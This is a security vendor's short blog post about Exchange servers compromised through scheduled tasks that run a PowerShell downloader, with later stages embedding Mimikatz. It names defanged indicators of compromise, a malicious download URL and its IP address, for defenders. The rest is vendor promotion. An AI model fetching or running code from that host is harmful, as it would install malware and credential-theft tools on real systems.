Under Attack? Breach Response Hotline: Call 833.997.7327 (US/CAN)

PowerShell

SpearTip | March 8th, 2021

 

Huntress Labs has discovered multiple partners with Exchange servers receiving malicious scheduled tasks that executed a PowerShell downloader from hxxp://p.estonine[.]com/p?e. According to Huntress Labs CEO, Kyle Hanslovan, the server is hosted on Digital Ocean resolves to the IP address 188.166.162[.]201 and it delivers a base64 encoded PowerShell script.

Kyle Hanslovan, Twitter

Details of PowerShell Downloader

This PowerShell script is similar in comparison to a coin miner campaign discovered by Carbon Black in 2019.

Huntress Labs reported their findings to Digital Ocean and the accompanying registrar NameCheap. After this, they discovered a fifth stage in the malware where two Mimikatz DLLs are embedded within the script which gets loaded or injected. Huntress has discovered over 200 compromised version of Exchange servers due to the vulnerabilities.

Kyle Hanslovan, Twitter

SpearTip’s professionals are closely monitoring this situation as it develops. If you have any questions regarding the Exchange Server vulnerabilities, don’t hesitate to reach out to our Security Operations Center at 833.997.7327.

SpearTip’s cyber professionals continuously monitor environments 24/7 in our US-based Security Operations Center. Our certified engineers work in unison with our proprietary endpoint detection and response tool, ShadowSpear®. This allows your organization to have direct communication with our engineers at any moment and a completely transparent view of your risk profile.

Categories

Connect With Us

Featured Articles

Protecting Space Satellites
Protecting Space Satellites Using Cybersecurity
25 March 2024
Ransomware-as-a-Service
Growing Cyber Threat: Ransomware-as-a-Service
11 March 2024
Information Security Threats
10 Information Security Threats IT Teams Need To Know
08 March 2024
Data Protection
Companies Investing More Into Data Protection
06 March 2024

See ShadowSpear in Action

Identify, neutralize, and counter cyberattacks - provide confidence in your security posture

Stay Connected With SpearTip

Inside the SOC Newsletter

View our articles that cover trending topics in cybersecurity with insights from our 24/7/365 Security Operations Center.

ShadowSpear Platform

Cybersecurity actors are working around the clock, shouldn’t your security team be too? Technology solutions and security controls fail for a number of reasons, poor deployment, improper implementation, or just no one monitoring the alerts.

ShadowSpear Demo

Experience ShadowSpear for yourself. Our lightweight, integrated solution will help you sleep easier at night and provide immediate confidence in your security posture.